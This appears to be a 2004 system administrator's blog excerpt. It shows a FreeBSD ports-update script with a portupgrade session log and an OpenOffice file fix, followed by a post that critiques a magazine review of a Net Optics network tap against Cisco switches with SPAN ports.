# According to portsdb(1), INDEX is updated only once per month or so.
# A look at http://www.freebsd.org/cgi/cvsweb.cgi/ports/#dirlist shows
# INDEX (the ports index for 4) and INDEX-5 (this ports index for 5).
# portsb(1) recommends running portsdb -uU

echo "portsdb -uU"
portsdb -uU

echo "cd /var/db"
cd /var/db

echo "pkgdb -u"
pkgdb -u

echo "portversion -v"
portversion -v

echo "portupgrade -varRp"
portupgrade -varRp

#echo "portsclean -CDD"
#portsclean -CDD

echo "Done updating ports tree at `/bin/date`."

Let's say I want to update the JDK on orr. First I update neely's ports tree and update neely's ports. The "-p" switch given to portupgrade in the previous script ensures portupgrade builds a package of the JDK when it's updated. On orr, I use this command once I've mounted neely's /usr/ports to orr's /usr/ports. The "-R" tells portupgrade to upgrade packages required by the given package. "-PP" tells portupgrade to only update using packages; in other words, it won't start updating by downloading source code. "-v" means be verbose.

orr:/root# portupgrade -RvPP jdk
---> Session started at: Sun, 04 Apr 2004 11:11:56 -0400
** No need to upgrade 'perl-5.6.1_15' (>= perl-5.6.1_15). (specify -f to force)
---> Checking the availability of the latest package of 'java/javavmwrapper'
---> Found a package of 'java/javavmwrapper': /usr/ports/packages/All/javavmwrapper-1.5.tbz
---> Upgrade of java/javavmwrapper started at: Sun, 04 Apr 2004 11:12:00 -0400
---> Upgrading 'javavmwrapper-1.4' to 'javavmwrapper-1.5' (java/javavmwrapper)
using a package
---> Updating dependency info
---> Modifying /var/db/pkg/jdk-1.4.2p5/+CONTENTS
---> Modifying /var/db/pkg/linux-sun-jdk-1.4.2.02/+CONTENTS
---> Uninstallation of javavmwrapper-1.4 started at: Sun, 04 Apr 2004 11:12:05 -0400
---> Fixing up dependencies before creating a package
---> Backing up the old version
---> Uninstalling the old version
---> Deinstalling 'javavmwrapper-1.4'
pkg_delete: package 'javavmwrapper-1.4' is required by these other packages
and may not be deinstalled (but I'll delete it anyway):
jdk-1.4.2p5
linux-sun-jdk-1.4.2.02
[Updating the pkgdb in /var/db/pkg ... - 250 packages found
(-1 +0) (...) done]
---> Uninstallation of javavmwrapper-1.4 ended at: Sun, 04 Apr 2004 11:12:08 -0400
(consumed 00:00:03)
---> Installation of javavmwrapper-1.5 started at: Sun, 04 Apr 2004 11:12:08 -0400
---> Installing the new version via the package
---> Removing the temporary backup files
---> Installation of javavmwrapper-1.5 ended at: Sun, 04 Apr 2004 11:12:10 -0400
(consumed 00:00:01)
---> Cleaning out obsolete shared libraries
[Updating the pkgdb in /var/db/pkg ... - 251 packages found
(-0 +1) . done]
---> Upgrade of java/javavmwrapper ended at: Sun, 04 Apr 2004 11:12:12 -0400
(consumed 00:00:11)
** No need to upgrade 'imake-4.3.0_2' (>= imake-4.3.0_2). (specify -f to force)
** No need to upgrade 'expat-1.95.7' (>= expat-1.95.7). (specify -f to force)
** No need to upgrade 'pkgconfig-0.15.0_1' (>= pkgconfig-0.15.0_1). (specify -f to force)
** No need to upgrade 'freetype2-2.1.7_2' (>= freetype2-2.1.7_2). (specify -f to force)
** No need to upgrade 'fontconfig-2.2.2,1' (>= fontconfig-2.2.2,1). (specify -f to force)
** No need to upgrade 'XFree86-libraries-4.3.0_6' (>= XFree86-libraries-4.3.0_6).
(specify -f to force)
** No need to upgrade 'urwfonts-1.0' (>= urwfonts-1.0). (specify -f to force)
** No need to upgrade 'open-motif-2.2.2_2' (>= open-motif-2.2.2_2). (specify -f to force)
---> Checking the availability of the latest package of 'java/jdk14'
---> Found a package of 'java/jdk14': /usr/ports/packages/All/jdk-1.4.2p6_4.tbz
---> Upgrade of java/jdk14 started at: Sun, 04 Apr 2004 11:14:04 -0400
---> Upgrading 'jdk-1.4.2p5' to 'jdk-1.4.2p6_4' (java/jdk14) using a package
---> Updating dependency info
---> Uninstallation of jdk-1.4.2p5 started at: Sun, 04 Apr 2004 11:14:09 -0400
---> Fixing up dependencies before creating a package
---> Backing up the old version
---> Uninstalling the old version
---> Deinstalling 'jdk-1.4.2p5'
[Updating the pkgdb in /var/db/pkg ... - 250 packages found
(-1 +0) (...) done]
---> Uninstallation of jdk-1.4.2p5 ended at: Sun, 04 Apr 2004 11:16:31 -0400
(consumed 00:02:22)
---> Installation of jdk-1.4.2p6_4 started at: Sun, 04 Apr 2004 11:17:08 -0400
---> Installing the new version via the package

SUN COMMUNITY SOURCE LICENSE Version 2.3 (Rev. Date Feb.
23, 1999)
...edited...
---> Removing the temporary backup files
---> Installation of jdk-1.4.2p6_4 ended at: Sun, 04 Apr 2004 11:18:14 -0400 (c
onsumed 00:01:05)
---> Cleaning out obsolete shared libraries
[Updating the pkgdb in /var/db/pkg ... - 251 packages found
(-0 +1) . done]
---> Upgrade of java/jdk14 ended at: Sun, 04 Apr 2004 11:18:19 -0400
(consumed 00:04:14)
---> Reporting the results (+:done / -:ignored / *:skipped / !:failed)
- lang/perl5 (perl-5.6.1_15)
+ java/javavmwrapper (javavmwrapper-1.4)
- devel/imake-4 (imake-4.3.0_2)
- textproc/expat2 (expat-1.95.7)
- devel/pkgconfig (pkgconfig-0.15.0_1)
- print/freetype2 (freetype2-2.1.7_2)
- x11-fonts/fontconfig (fontconfig-2.2.2,1)
- x11/XFree86-4-libraries (XFree86-libraries-4.3.0_6)
- x11-fonts/urwfonts (urwfonts-1.0)
- x11-toolkits/open-motif (open-motif-2.2.2_2)
+ java/jdk14 (jdk-1.4.2p5)
---> Session ended at: Sun, 04 Apr 2004 11:18:27 -0400 (consumed 00:06:30)

This process allows me to build all of my packages on one machine, and then install them quickly and easily on similar systems. I cannot use this method to share packages built on FreeBSD 5.x with systems running 4.x, however. At the moment I've confined myself to sharing packages between machines running strictly the same OS version.

I like this method because it also ensures I don't waste time on slower machines building packages. Furthermore, it ensures that only packages which are capable of being built are deployed on end systems. Sometimes ports are broken, so by using a dedicated package building system I test all of those issues on one box.

When I finally had the package of OpenOffice 1.1.1 built, I used 'portupgrade -PPRv openoffice' to update orr. OpenOffice installed a new copy of its localization files in ~/OpenOffice.org1.1.1 and I had to tell it to look in /usr/local/jdk1.4.2/jre to find the Java Runtime Environment it needed. I also encountered the same two missing files documented here, and used the same method to fix the issue:

orr:/home/richard/OpenOffice.org1.1.0$ find . -name libmozab*.so
./program/libmozab2.so
./program/libmozabdrv2.so
orr:/home/richard/OpenOffice.org1.1.0$ cp ./program/libmozab*
/home/richard/OpenOffice.org1.1.1/program/

Saturday, April 03, 2004

Network Computing Misses the Mark

Network Computing profiled the Net Optics 10/100BaseT Port Aggregator Tap. This device is unique in that it combines the two transmit lines from ports A and B into a single output, adding memory to buffer bursts exceeding 100 Mbps. I was glad to see this product receive attention in Network Computing, but I think the reviewer missed the mark. I was especially disappointed to read this comment:

"...the unit is cost-effective only if you » need to multiplex a full-duplex network onto a half-duplex connection, » expect short traffic bursts above 100 percent utilization or » can't risk a down link from a loss of power on the tap. If none of these conditions apply, you're better off buying a switch with a mirror port off eBay for about $300."

Does this author seriously recommend enterprise customers buy equipment from eBay? I'm a big eBay fan, having bought many servers from eBay for my home network. I wouldn't recommend doing the same at work. Furthermore, is Network Computing advocating buying Cisco gear from eBay? Do they know a purchase of auctioned Cisco gear doesn't include a license for IOS? Cisco allows customers to buy licenses for used equipment, but their pricing is so outrageous it makes sense to buy new equipment.

You can buy a new 12 port Cisco 2950 for a little over $600 at CDW.com. A cheap SMARTNet contract costs less than $100. So, for $700, you have a device with a SPAN port to watch network traffic in place of the tap. Unfortunately, the SPAN port hides link errors from the monitor. The SPAN port also isn't built to handle traffic over 100 Mbps like the memory-enhanced Net Optics Port Aggregator.

At this point the switch advocate might want to invest in a port with a gigabit SPAN port, like the 2950T. Now the cost of the switch alone is over $900 and the price advantage compared to the tap disappears. (The tap is listed at $950 in the NWC story.)

There's a reason why Net Optics priced their product as they did. They are selling professional-grade devices built for serious monitoring that preserves full duplex links.